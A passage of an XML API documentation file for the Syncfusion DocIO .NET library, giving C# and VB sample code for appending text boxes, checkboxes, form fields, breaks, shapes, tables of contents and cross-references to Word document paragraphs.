                //Add a paragraph to a section
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to paragraph
                paragraph.AppendText("Working with endnotes");
                //Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add a paragraph to a section
                paragraph = section.AddParagraph();
                //Append the endnote
                WFootnote endnote = (WFootnote)  paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Endnote);
                //Set the endnote character format
                endnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript;
                //Insert the text into the paragraph
                paragraph.AppendText("Sample content for endnotes").CharacterFormat.Bold = true;
                //Add footnote text
                paragraph = endnote.TextBody.AddParagraph();
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new document
                Dim document As New WordDocument()
                'Create a section
                Dim section As IWSection = document.AddSection()
                'Add a paragraph to a section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to paragraph
                paragraph.AppendText("Working with endnotes")
                'Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add a paragraph to a section
                paragraph = section.AddParagraph()
                'Append the endnote
                Dim endnote As WFootnote = DirectCast(paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Endnote), WFootnote)
                'Set the endnote character format
                endnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript
                'Insert the text into the paragraph
                paragraph.AppendText("Sample content for endnotes").CharacterFormat.Bold = True
                'Add footnote text
                paragraph = endnote.TextBody.AddParagraph()
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendTextBox(System.Single,System.Single)">
            <summary>
            Append textbox to the end of the paragraph with the specified width and height.
            </summary>
            <param name="width">The <b>float</b> specifies the width of the textbox.</param>
            <param name="height">The <b>float</b> specifies the height of the textbox.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWTextBox"/> instance that represents the newly added textbox.</returns>
            <example> The following example illustrates how to add a endnote to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Append new textbox to the paragraph
                IWTextBox textbox = paragraph.AppendTextBox(150, 75);
                //Add new text to the textbox body
                IWParagraph textboxParagraph = textbox.TextBoxBody.AddParagraph();
                textboxParagraph.AppendText("Text inside text box");
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append new textbox to the paragraph
                Dim textbox As IWTextBox = paragraph.AppendTextBox(150, 75)
                'Add new text to the textbox body
                Dim textboxParagraph As IWParagraph = textbox.TextBoxBody.AddParagraph()
                textboxParagraph.AppendText("Text inside text box")
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendCheckBox">
            <summary>
            Appends the check box to the paragraph.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WCheckBox"/> instance that represents the newly added checkbox.</returns>
            <example> The following example illustrates how to add a checkbox to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("Gender\t");
                //Append new Checkbox
                WCheckBox checkbox = paragraph.AppendCheckBox();
                checkbox.Checked = false;
                //Set Checkbox size
                checkbox.CheckBoxSize = 10; 
                checkbox.CalculateOnExit = true;
                //Set help text
                checkbox.Help = "Help text";
                paragraph.AppendText("Male\t");
                checkbox = paragraph.AppendCheckBox();
                checkbox.Checked = false;
                checkbox.CheckBoxSize = 10;
                checkbox.CalculateOnExit = true;
                paragraph.AppendText("Female");
                //Save the Word document
                document.Save("Checkbox.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("Gender" &amp; vbTab)
                'Append new Checkbox
                Dim checkbox As WCheckBox = paragraph.AppendCheckBox()
                checkbox.Checked = False
                'Set Checkbox size
                checkbox.CheckBoxSize = 10
                checkbox.CalculateOnExit = True
                'Set help text
                checkbox.Help = "Help text"
                paragraph.AppendText("Male" &amp; vbTab)
                checkbox = paragraph.AppendCheckBox()
                checkbox.Checked = False
                checkbox.CheckBoxSize = 10
                checkbox.CalculateOnExit = True
                paragraph.AppendText("Female")
                'Save the Word document
                document.Save("Checkbox.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendCheckBox(System.String,System.Boolean)">
            <summary>
            Appends the check box to the paragraph with specified name and default value.
            </summary>
            <param name="checkBoxName">The <b>string</b> that specifies the name of the check box.</param>
            <param name="defaultCheckBoxValue">A <b>Boolean</b> indicating the default value of the checkbox. 
            <b>True </b>if the checkbox should be checked by default; otherwise, <b>false</b>.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WCheckBox"/> instance that represents the newly added checkbox.</returns>
            <example> The following example illustrates how to add a checkbox to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("Gender\t");
                //Append new Checkbox
                WCheckBox checkbox = paragraph.AppendCheckBox("CheckBox1", true);
                //checkbox.Checked = false;
                //Set Checkbox size
                checkbox.CheckBoxSize = 10;
                checkbox.CalculateOnExit = true;
                //Set help text
                checkbox.Help = "Help text";
                paragraph.AppendText("Male\t");
                checkbox = paragraph.AppendCheckBox("CheckBox2",false);
                //checkbox.Checked = false;
                checkbox.CheckBoxSize = 10;
                checkbox.CalculateOnExit = true;
                paragraph.AppendText("Female");
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("Gender" &amp; vbTab)
                'Append new Checkbox
                Dim checkbox As WCheckBox = paragraph.AppendCheckBox("CheckBox1", True)
                'checkbox.Checked = false;
                'Set Checkbox size
                checkbox.CheckBoxSize = 10
                checkbox.CalculateOnExit = True
                'Set help text
                checkbox.Help = "Help text"
                paragraph.AppendText("Male" &amp; vbTab)
                checkbox = paragraph.AppendCheckBox("CheckBox2", False)
                'checkbox.Checked = false;
                checkbox.CheckBoxSize = 10
                checkbox.CalculateOnExit = True
                paragraph.AppendText("Female")
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendTextFormField(System.String)">
            <summary>
            Appends the text form field to the paragraph with the specified default text.
            </summary>
            <param name="defaultText">The <b>string</b> specifying the default text. 
            To insert default Word text, "null" can be passed as parameter.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WTextFormField"/> instance that represents the newly added text form field.</returns>
            <example> The following example illustrates how to add a text form field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("General Information");
                section.AddParagraph();
                paragraph = section.AddParagraph() as WParagraph;
                IWTextRange text = paragraph.AppendText("Name\t");
                text.CharacterFormat.Bold = true;
                //Append Text form field 
                WTextFormField textfield = paragraph.AppendTextFormField(null);
                //Set type of Text form field
                textfield.Type = TextFormFieldType.RegularText;
                textfield.CharacterFormat.FontName = "Calibri";
                textfield.CalculateOnExit = true;
                //Save the Word document
                document.Save("Textfield.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("General Information")
                section.AddParagraph()
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                Dim text As IWTextRange = paragraph.AppendText("Name" &amp; vbTab)
                text.CharacterFormat.Bold = True
                'Append Text form field 
                Dim textfield As WTextFormField = paragraph.AppendTextFormField(Nothing)
                'Set type of Text form field
                textfield.Type = TextFormFieldType.RegularText
                textfield.CharacterFormat.FontName = "Calibri"
                textfield.CalculateOnExit = True
                'Save the Word document
                document.Save("Textfield.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendTextFormField(System.String,System.String)">
            <summary>
            Appends the text form field to the paragraph with the specified field name and default text.
            </summary>
            <param name="formFieldName">The <b>string </b>that specifies the name of the form field.</param>
            <param name="defaultText">The <b>string</b> specifying the default text. 
            To insert default Word text, "null" can be passed as parameter.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WTextFormField"/> instance that represents the newly added text form field.</returns>
            <example> The following example illustrates how to add a text form field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("General Information");
                section.AddParagraph();
                paragraph = section.AddParagraph() as WParagraph;
                IWTextRange text = paragraph.AppendText("Date of Birth\t");
                text.CharacterFormat.Bold = true;
                //Append Text form field
                WTextFormField textfield = paragraph.AppendTextFormField("Date field", DateTime.Now.ToString("MM/DD/YY"));
                textfield.StringFormat = "MM/DD/YY";
                //Set Text form field type
                textfield.Type = TextFormFieldType.DateText;
                textfield.CalculateOnExit = true;
                //Save the Word document
                document.Save("Textfield.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("General Information")
                section.AddParagraph()
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                Dim text As IWTextRange = paragraph.AppendText("Date of Birth" &amp; vbTab)
                text.CharacterFormat.Bold = True
                'Append Text form field
                Dim textfield As WTextFormField = paragraph.AppendTextFormField("Date field", DateTime.Now.ToString("MM/DD/YY"))
                textfield.StringFormat = "MM/DD/YY"
                'Set Text form field type
                textfield.Type = TextFormFieldType.DateText
                textfield.CalculateOnExit = True
                'Save the Word document
                document.Save("Textfield.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendDropDownFormField">
            <summary>
            Appends the drop down form field to the paragraph.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WDropDownFormField"/> instance that represents the newly added drop down form field.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendDropDownFormField(System.String)">
            <summary>
            Appends the drop down form field to the paragraph.
            </summary>
            <param name="dropDropDownName">The <b>string</b> that specifies the name of the drop drop down field.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WDropDownFormField"/> instance that represents the newly added drop down form field.</returns>
            <example> The following example illustrates how to add a checkbox to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("Educational Qualification\t");
                //Append Dropdown field
                WDropDownFormField dropdownfield = paragraph.AppendDropDownFormField("FieldName");
                //Add items to the dropdown items collection
                dropdownfield.DropDownItems.Add("Higher");
                dropdownfield.DropDownItems.Add("Vocational");
                dropdownfield.DropDownItems.Add("Universal");
                dropdownfield.Enabled = true;
                //Set the item index for default value
                dropdownfield.DropDownSelectedIndex = 1;
                dropdownfield.CalculateOnExit = true;
                //Save the Word document
                document.Save("Dropdown.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("Educational Qualification" &amp; vbTab)
                'Append Dropdown field
                Dim dropdownfield As WDropDownFormField = paragraph.AppendDropDownFormField("FieldName")
                'Add items to the dropdown items collection
                dropdownfield.DropDownItems.Add("Higher")
                dropdownfield.DropDownItems.Add("Vocational")
                dropdownfield.DropDownItems.Add("Universal")
                dropdownfield.Enabled = True
                'Set the item index for default value
                dropdownfield.DropDownSelectedIndex = 1
                dropdownfield.CalculateOnExit = True
                'Save the Word document
                document.Save("Dropdown.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendSymbol(System.Byte)">
            <summary>
            Appends special symbol specified by the character code to end of the paragraph.
            </summary>
            <param name="characterCode">The <b>byte</b> represents the character code of the symbol.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WSymbol"/> instance that represents the newly added symbol.</returns>
            <example> The following example illustrates how to add a symbol to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Example of adding symbols to the paragraph: ");
                //Insert symbol with character code 100
                paragraph.AppendSymbol(100);
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Example of adding symbols to the paragraph: ")
                'Insert symbol with character code 100
                paragraph.AppendSymbol(100)
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendBreak(Syncfusion.DocIO.DLS.BreakType)">
            <summary>
            Appends break of the specified type to end of the paragraph.
            </summary>
            <param name="breakType">The <see cref="T:Syncfusion.DocIO.DLS.BreakType"/> member that specifies the type of break.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Break"/> instance that represents the newly added break.</returns>
            <example> The following example illustrates how to add a break to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Before line break");
                //Add line break to the paragraph
                paragraph.AppendBreak(BreakType.LineBreak);
                paragraph.AppendText("After line break");
                IWParagraph pageBreakPara = section.AddParagraph();
                pageBreakPara.AppendText("Before page break");
                //Add page break to the paragraph
                pageBreakPara.AppendBreak(BreakType.PageBreak);
                pageBreakPara.AppendText("After page break");
                IWSection secondSection = document.AddSection();
                //Add columns to the section
                secondSection.AddColumn(100, 2);
                secondSection.AddColumn(100, 2);
                IWParagraph columnBreakPara = secondSection.AddParagraph();
                columnBreakPara.AppendText("Before column break");
                //Add column break to the paragraph
                columnBreakPara.AppendBreak(BreakType.ColumnBreak);
                columnBreakPara.AppendText("After column break");
                //Save and Close the document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Before line break")
                'Add line break to the paragraph
                paragraph.AppendBreak(BreakType.LineBreak)
                paragraph.AppendText("After line break")
                Dim pageBreakPara As IWParagraph = section.AddParagraph()
                pageBreakPara.AppendText("Before page break")
                'Add page break to the paragraph
                pageBreakPara.AppendBreak(BreakType.PageBreak)
                pageBreakPara.AppendText("After page break")
                Dim secondSection As IWSection = document.AddSection()
                'Add columns to the section
                secondSection.AddColumn(100, 2)
                secondSection.AddColumn(100, 2)
                Dim columnBreakPara As IWParagraph = secondSection.AddParagraph()
                columnBreakPara.AppendText("Before column break")
                'Add column break to the paragraph
                columnBreakPara.AppendBreak(BreakType.ColumnBreak)
                columnBreakPara.AppendText("After column break")
                'Save and Close the document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendShape(Syncfusion.DocIO.DLS.AutoShapeType,System.Single,System.Single)">
            <summary>
            Appends <see cref="T:Syncfusion.DocIO.DLS.Shape"/> of specified type, width and height to the end of paragraph.
            </summary>
            <param name="autoShapeType">The <see cref="T:Syncfusion.DocIO.DLS.AutoShapeType"/> member that specifies the shape type.</param>
            <param name="width">The <b>float </b> that specifies the width of the shape.</param>
            <param name="height">The <b>float </b> that specifies the height of the shape.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Shape"/> instance that represents the newly added shape.</returns>
            <example> The following example illustrates how to add a shape to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                //Add new shape to the document
                Shape rectangle = paragraph.AppendShape(AutoShapeType.RoundedRectangle, 150, 100);
                //Set position for shape
                rectangle.VerticalPosition = 72;
                rectangle.HorizontalPosition = 72;
                paragraph = section.AddParagraph() as WParagraph;
                //Add text body contents to the shape
                paragraph = rectangle.TextBody.AddParagraph() as WParagraph;
                IWTextRange text = paragraph.AppendText("This text is in rounded rectangle shape");
                text.CharacterFormat.TextColor = Color.Green;
                text.CharacterFormat.Bold = true;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                'Add new shape to the document
                Dim rectangle As Shape = paragraph.AppendShape(AutoShapeType.RoundedRectangle, 150, 100)
                'Set position for shape
                rectangle.VerticalPosition = 72
                rectangle.HorizontalPosition = 72
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                'Add text body contents to the shape
                paragraph = TryCast(rectangle.TextBody.AddParagraph(), WParagraph)
                Dim text As IWTextRange = paragraph.AppendText("This text is in rounded rectangle shape")
                text.CharacterFormat.TextColor = Color.Green
                text.CharacterFormat.Bold = True
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close() 
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendTOC(System.Int32,System.Int32)">
            <summary>
            Appends the table of content to the end of the paragraph with the specified lower and upper heading levels.
            </summary>
            <param name="lowerHeadingLevel">The <b>integer </b> specifying the starting heading level of the table of content.</param>
            <param name="upperHeadingLevel">The <b>integer </b> specifying the ending heading level of the table of content.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TableOfContent"/> instance that represents the newly added table of content.</returns>
            <example> The following example illustrates how to add a table of contents to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into the Word document
                IWSection section = document.AddSection();
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Add the paragraph into the created section
                IWParagraph paragraph = section.AddParagraph();
                //Append the TOC field with LowerHeadingLevel and UpperHeadingLevel to determines the TOC entries
                paragraph.AppendTOC(1, 3);
                //Add the section into the Word document
                section = document.AddSection();
                //Add the paragraph into the created section
                paragraph = section.AddParagraph(); 
                //Add the text for the headings
                paragraph.AppendText("First Chapter");
                //Set a build in heading style.
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add the text into the paragraph
                section.AddParagraph().AppendText(paraText);
                //Add the section into the Word document
                section = document.AddSection();
                //Add the paragraph into the created section
                paragraph = section.AddParagraph();
                //Add the text for the headings
                paragraph.AppendText("Second Chapter");
                //Set a build in heading style.
                paragraph.ApplyStyle(BuiltinStyle.Heading2);
                //Add the text into the paragraph
                section.AddParagraph().AppendText(paraText);
                //Add the section into the Word document
                section = document.AddSection();
                //Add the paragraph into the created section
                paragraph = section.AddParagraph();
                //Add the text into the headings
                paragraph.AppendText("Third Chapter");
                //Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading3);
                //Add the text into the paragraph.
                section.AddParagraph().AppendText(paraText);
                //Update the table of contents
                document.UpdateTableOfContents();
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into the Word document
                Dim section As IWSection = document.AddSection()
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Add the paragraph into the created section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the TOC field with LowerHeadingLevel and UpperHeadingLevel to determines the TOC entries
                paragraph.AppendTOC(1, 3)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text for the headings
                paragraph.AppendText("First Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add the text into the paragraph.
                section.AddParagraph().AppendText(paraText)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text for the headings
                paragraph.AppendText("Second Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading2)
                'Add the text into the paragraph
                section.AddParagraph().AppendText(paraText)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text into the headings
                paragraph.AppendText("Third Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading3)
                'Add the text into the paragraph
                section.AddParagraph().AppendText(paraText)
                'Update the table of contents
                document.UpdateTableOfContents()
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendCrossReference(Syncfusion.DocIO.ReferenceType,Syncfusion.DocIO.ReferenceKind,Syncfusion.DocIO.DLS.Entity,System.Boolean,System.Boolean,System.Boolean,System.String)">
            <summary>
            Appends a Cross-Reference of specified reference type, reference kind, entity, hyperlink, separators at the end of the paragraph.
            </summary>
            <param name="referenceType">The <see cref="T:Syncfusion.DocIO.ReferenceType"/> member that specifies the 
            type of item for which a cross-reference is to be inserted.</param>
            <param name="referenceKind">The <see cref="T:Syncfusion.DocIO.ReferenceKind"/> member that specifies the 
            information to be included in the cross-reference.</param>
            <param name="referenceEntity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> for which a cross-reference is to be inserted.</param>
            <param name="insertAsHyperlink"><b>True</b> if to insert the cross-reference as a hyperlink to the referenced item; otherwise, <b>false</b>.</param>
            <param name="includePosition"><b>True</b> if to insert "above" or "below," depending on the location of the reference item in relation to the cross-reference.</param>
            <param name="separatorNumber"><b>True</b> if to use a separator to separate the numbers from the associated text; otherwise, <b>false</b>.(Used only if the ReferenceKind parameter is set to ParagraphNumberFullContext).</param>
            <param name="separatorString">The <b>string</b> that specifies a separator if the separateNumber parameter is set to <b>true</b>.</param>
            <remarks><list type="bullet">
            <item>The cross reference fields can be created and updated only for the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> in a document.</item>
            <item>Use the <see cref="M:Syncfusion.DocIO.DLS.WordDocument.GetCrossReferenceItems(Syncfusion.DocIO.ReferenceType)"/> method to get a list of items that can have cross-reference. 
            </item>
            </list> 
            </remarks>
            <example> The following example illustrates how to append a cross-reference for bookmark to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                IWParagraph paragraph = section.AddParagraph();
                //Add text, bookmark start and end in the paragraph
                paragraph.AppendBookmarkStart("Title");
                paragraph.AppendText("Northwind Database");
                paragraph.AppendBookmarkEnd("Title");
                paragraph = section.AddParagraph();
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.");
                section = document.AddSection();
                section.AddParagraph();
                paragraph = section.AddParagraph() as WParagraph;
                //Get the collection of bookmark start in the word document
                List&lt;Entity&gt; items = document.GetCrossReferenceItems(ReferenceType.Bookmark);
                paragraph.AppendText("Bookmark Cross Reference starts here ");
                //Append the cross reference for bookmark �Title� with ContentText as reference kind
                paragraph.AppendCrossReference(ReferenceType.Bookmark, ReferenceKind.ContentText, items[0], true, false, false, string.Empty);
                //Update the document Fields
                document.UpdateDocumentFields();
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add text, bookmark start and end in the paragraph
                paragraph.AppendBookmarkStart("Title")
                paragraph.AppendText("Northwind Database")
                paragraph.AppendBookmarkEnd("Title")
                paragraph = section.AddParagraph()
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.")
                section = document.AddSection()
                section.AddParagraph()
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                'Get the collection of bookmark start in the word document
                Dim items As List(Of Entity) = document.GetCrossReferenceItems(ReferenceType.Bookmark)
                paragraph.AppendText("Bookmark Cross Reference starts here ")
                'Append the cross reference for bookmark �Title� with ContentText as reference kind
